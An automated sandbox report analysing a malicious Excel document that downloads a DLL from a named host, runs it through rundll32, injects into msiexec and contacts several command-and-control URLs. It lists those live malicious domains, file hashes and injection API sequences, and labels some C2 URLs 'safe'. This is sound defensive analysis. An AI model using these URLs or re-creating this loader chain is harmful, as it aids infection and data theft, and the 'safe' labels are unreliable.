Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Bir\fuy.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe TID: 3052

Thread sleep time: -300000s >= -30000s

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E8669A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_6E8669A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E85D830 LoadLibraryA,GetProcAddress,

4_2_6E85D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E862EF0 mov eax, dword ptr fs:[00000030h]	4_2_6E862EF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8947A1 mov eax, dword ptr fs:[00000030h]	4_2_6E8947A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8942DE push dword ptr fs:[00000030h]	4_2_6E8942DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8946D7 mov eax, dword ptr fs:[00000030h]	4_2_6E8946D7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000F2EF0 mov eax, dword ptr fs:[00000030h]	5_2_000F2EF0

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E85AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,

4_2_6E85AE40

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe			Jump to behavior

Source: msiexec.exe, 00000005.00000002.2358033392.0000000000D60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000005.00000002.2358033392.0000000000D60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: msiexec.exe, 00000005.00000002.2358033392.0000000000D60000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E851A00 CreateDialogParamW,GetVersion,

4_2_6E851A00

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Access Token Manipulation1	Masquerading1	OS Credential Dumping	Security Software Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution43	Boot or Logon Initialization Scripts	Process Injection112	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection112	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	System Information Discovery14	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
case (61).xls	0%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.msiexec.exe.e0000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File
4.2.rundll32.exe.6e850000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://conssapratigdevi.tk/hyyn	0%	Avira URL Cloud	safe
https://groceryasian.com/	0%	Avira URL Cloud	safe
https://conssapratigdevi.tk/My	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl3.digicer	0%	Avira URL Cloud	safe
https://groceryasian.com/post.phpq	0%	Avira URL Cloud	safe
https://conssapratigdevi.tk/post.php	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://groceryasian.com/post.phpg	0%	Avira URL Cloud	safe
https://forteanhub.com/post.phpNn	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://conssapratigdevi.tk/post.phpad	0%	Avira URL Cloud	safe
https://forteanhub.com/post.php	0%	Avira URL Cloud	safe
https://forteanhub.com/	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://crl3.digice	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
groceryasian.com	172.67.209.71	true	false	unknown
conssapratigdevi.tk	172.67.152.74	true	false	unknown
fortnitehecks.com	104.21.23.220	true	false	unknown
forteanhub.com	104.21.86.32	true	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000003.00000002.2156995154.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2156995154.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp	false		high
https://conssapratigdevi.tk/hyyn	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://groceryasian.com/	msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false		high
https://conssapratigdevi.tk/My	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl3.digicer	msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://groceryasian.com/post.phpq	msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://conssapratigdevi.tk/post.php	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2157396187.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156465361.0000000001F17000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000003.00000002.2156995154.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp	false		high
https://groceryasian.com/post.phpg	msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000003.00000002.2157396187.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156465361.0000000001F17000.00000002.00000001.sdmp	false		high
https://forteanhub.com/post.phpNn	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2157396187.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156465361.0000000001F17000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	msiexec.exe, 00000005.00000002.2358064961.0000000002160000.00000002.00000001.sdmp	false		high
https://conssapratigdevi.tk/post.phpad	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://forteanhub.com/post.php	msiexec.exe, 00000005.00000002.2357906942.00000000005A8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://forteanhub.com/	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2156995154.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	msiexec.exe, 00000005.00000002.2358064961.0000000002160000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://crl3.digice	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.152.74	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.209.71	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.86.32	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.23.220	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	343270
Start date:	22.01.2021
Start time:	16:43:44
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	case (61).xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.expl.evad.winXLS@7/12@5/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 69.6% (good quality ratio 69.3%) Quality average: 89.5% Quality standard deviation: 19.2%
HCA Information:	Successful, ratio: 85% Number of executed functions: 40 Number of non-executed functions: 20
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:45:13	API Interceptor	1191x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	23.227.38.74
	file.exe	Get hash	malicious	Browse	104.21.19.200
	2531 2212 2020 QG-826729.doc	Get hash	malicious	Browse	172.67.199.174
	IMG_9501.EXE	Get hash	malicious	Browse	172.67.188.154
	Arch 30 S_07215.doc	Get hash	malicious	Browse	104.21.84.115
	Vivaldi.3.5.2115.87.x64.exe	Get hash	malicious	Browse	104.22.68.109
	SecuriteInfo.com.Trojan.PackedNET.507.9142.exe	Get hash	malicious	Browse	172.67.188.154
	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	104.21.84.118
	Info-237-602317.doc	Get hash	malicious	Browse	104.21.47.92
	Info-237-602317.doc	Get hash	malicious	Browse	172.67.146.96
	Enq No 34 22-01-2021.exe	Get hash	malicious	Browse	104.23.98.190
	8776139.docm	Get hash	malicious	Browse	104.21.14.53
	8776139.docm	Get hash	malicious	Browse	104.21.14.53
	8776139.docm	Get hash	malicious	Browse	172.67.157.219
	433.doc	Get hash	malicious	Browse	104.21.4.38
	69WGZvg6P8.exe	Get hash	malicious	Browse	172.67.188.154
	118.apk	Get hash	malicious	Browse	104.18.226.52
	RFQSDCL1005C1N5STDFM01.doc	Get hash	malicious	Browse	104.21.19.200
	IFS_1.0.69.apk	Get hash	malicious	Browse	104.21.27.129
	IFS_1.0.69.apk	Get hash	malicious	Browse	172.67.142.155
CLOUDFLARENETUS	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	23.227.38.74
	file.exe	Get hash	malicious	Browse	104.21.19.200
	2531 2212 2020 QG-826729.doc	Get hash	malicious	Browse	172.67.199.174
	IMG_9501.EXE	Get hash	malicious	Browse	172.67.188.154
	Arch 30 S_07215.doc	Get hash	malicious	Browse	104.21.84.115
	Vivaldi.3.5.2115.87.x64.exe	Get hash	malicious	Browse	104.22.68.109
	SecuriteInfo.com.Trojan.PackedNET.507.9142.exe	Get hash	malicious	Browse	172.67.188.154
	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	104.21.84.118
	Info-237-602317.doc	Get hash	malicious	Browse	104.21.47.92
	Info-237-602317.doc	Get hash	malicious	Browse	172.67.146.96
	Enq No 34 22-01-2021.exe	Get hash	malicious	Browse	104.23.98.190
	8776139.docm	Get hash	malicious	Browse	104.21.14.53
	8776139.docm	Get hash	malicious	Browse	104.21.14.53
	8776139.docm	Get hash	malicious	Browse	172.67.157.219
	433.doc	Get hash	malicious	Browse	104.21.4.38
	69WGZvg6P8.exe	Get hash	malicious	Browse	172.67.188.154
	118.apk	Get hash	malicious	Browse	104.18.226.52
	RFQSDCL1005C1N5STDFM01.doc	Get hash	malicious	Browse	104.21.19.200
	IFS_1.0.69.apk	Get hash	malicious	Browse	104.21.27.129
	IFS_1.0.69.apk	Get hash	malicious	Browse	172.67.142.155

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	USD_ Payment Schedule.xls	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	8776139.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	8776139.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	7375568.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	6213805.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	7375568.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	6213805.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	invoice 2021.xlsx	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1374623.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	7653684.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1403181.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1374623.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	7653684.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1403181.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	2736760.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	2736760.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1_Total New Invoices-Thursday January 21_2021.xlsm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	Enquiry 2021.ppt	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1 Total New Invoices-Thursday January 21 2021.xlsm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	Notification_20443258.xls	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220

Dropped Files

No context

Created / dropped Files

C:\ProgramData\OneNote.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	279040
Entropy (8bit):	6.822417966790041
Encrypted:	false
SSDEEP:	6144:1/oqv+z4/KDhYxNzQkR6sfPliEC3iNEt0Filb0ilBQY+Wj:1/dv+z45QkRZfPlTC3iNbFcoiTbj
MD5:	7CFF1113D30B8E4CD51BA13F40B9D2D5
SHA1:	6A0B90E9B0861CB42FECD217651D25C2E9EABF7D
SHA-256:	5C0F9C9BABC640A2578B1D3E8CACB60DF32A0437EF3F9383D00ED88A7CEF3A62
SHA-512:	2A9420971587E2234DB54A5008C9A861C337DFCBEB94698FD04A5E0481794F5CC510D81A6548BBB9F0B2A024A31D46A954768A0E8F6B0DD19CF7602A284D4862
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e\|.6!..e!..e!..e,O;e;..e,O.e6..e,O:eJ..e...e$..e!..en..e,O?e ..e,O.e ..e,O.e ..e,O.e ..eRich!..e........PE..L...r..T...........!.....b...v.......$....................................................@.............................s...D...P....... .......................<...p...8...............................@............... ............................text....a.......b.................. ..`.rdata...............f..............@..@.data....... ......................@....rsrc... ...........................@..@.reloc..<............*..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	279040
Entropy (8bit):	6.822417966790041
Encrypted:	false
SSDEEP:	6144:1/oqv+z4/KDhYxNzQkR6sfPliEC3iNEt0Filb0ilBQY+Wj:1/dv+z45QkRZfPlTC3iNbFcoiTbj
MD5:	7CFF1113D30B8E4CD51BA13F40B9D2D5
SHA1:	6A0B90E9B0861CB42FECD217651D25C2E9EABF7D
SHA-256:	5C0F9C9BABC640A2578B1D3E8CACB60DF32A0437EF3F9383D00ED88A7CEF3A62
SHA-512:	2A9420971587E2234DB54A5008C9A861C337DFCBEB94698FD04A5E0481794F5CC510D81A6548BBB9F0B2A024A31D46A954768A0E8F6B0DD19CF7602A284D4862
Malicious:	true
Reputation:	low
IE Cache URL:	https://fortnitehecks.com/kev/xeda.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e\|.6!..e!..e!..e,O;e;..e,O.e6..e,O:eJ..e...e$..e!..en..e,O?e ..e,O.e ..e,O.e ..e,O.e ..eRich!..e........PE..L...r..T...........!.....b...v.......$....................................................@.............................s...D...P....... .......................<...p...8...............................@............... ............................text....a.......b.................. ..`.rdata...............f..............@..@.data....... ......................@....rsrc... ...........................@..@.reloc..<............*..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9FDE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	59772
Entropy (8bit):	7.768418554476927
Encrypted:	false
SSDEEP:	768:SwgBP+IOXMOe4viH/WoTXZSzrSZpYwstXEtdd9iS2F0S:SwUWIuviH/WaIYew9oL
MD5:	A5828478EC72D38CDF3BC76F76E3A0A8
SHA1:	2957D2AA988FFFF2B5086DA52E28617DA7F56F7C
SHA-256:	6242AB1235A8449FAC52A58A5EEBC9F74A0D0F8655858EF62C9A2BC6180100A0
SHA-512:	D2D8AB87A51007713BE68B909CACD805AFD0B0B510DECE75D97B97B05C0CF5D2CABE50797B86D71AD32B782D110E3FE4344BC815ADB9716A41CA880E09558E09
Malicious:	false
Reputation:	low
Preview:	..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..\|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r\|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a..BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{\|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Bir\fuy.dll Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	279040
Entropy (8bit):	6.822417966790041
Encrypted:	false
SSDEEP:	6144:1/oqv+z4/KDhYxNzQkR6sfPliEC3iNEt0Filb0ilBQY+Wj:1/dv+z45QkRZfPlTC3iNbFcoiTbj
MD5:	7CFF1113D30B8E4CD51BA13F40B9D2D5
SHA1:	6A0B90E9B0861CB42FECD217651D25C2E9EABF7D
SHA-256:	5C0F9C9BABC640A2578B1D3E8CACB60DF32A0437EF3F9383D00ED88A7CEF3A62
SHA-512:	2A9420971587E2234DB54A5008C9A861C337DFCBEB94698FD04A5E0481794F5CC510D81A6548BBB9F0B2A024A31D46A954768A0E8F6B0DD19CF7602A284D4862
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e\|.6!..e!..e!..e,O;e;..e,O.e6..e,O:eJ..e...e$..e!..en..e,O?e ..e,O.e ..e,O.e ..e,O.e ..eRich!..e........PE..L...r..T...........!.....b...v.......$....................................................@.............................s...D...P....... .......................<...p...8...............................@............... ............................text....a.......b.................. ..`.rdata...............f..............@..@.data....... ......................@....rsrc... ...........................@..@.reloc..<............*..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jan 22 23:44:42 2021, atime=Fri Jan 22 23:44:42 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.476113150707095
Encrypted:	false
SSDEEP:	12:85Q8CLgXg/XAlCPCHaXgzB8IB/jUE6X+WnicvbjbDtZ3YilMMEpxRljKfkcTdJP8:85jU/XTwz6IheYebDv3qekwrNru/
MD5:	FE93FE13F071B8ACF580B17424A54C39
SHA1:	281A498FD67A0CF28637C28B130A62E7C878D697
SHA-256:	4974489DFFD78E15FBC5FCAD14505867A19B2CDFF0EAC4AB0DD5E44C8DD4D583
SHA-512:	F671BFEADE902290A625F92CEEC79429E16D597CAD4A8015F07260E3501728FF391815EB70C703445C03CB642C9117BD32BE6F3A1B5E890DE0033E0E5E3F4700
Malicious:	false
Reputation:	low
Preview:	L..................F...........7G...^U. ....^U. .... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....7R....Desktop.d......QK.X7R....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\case (61).LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
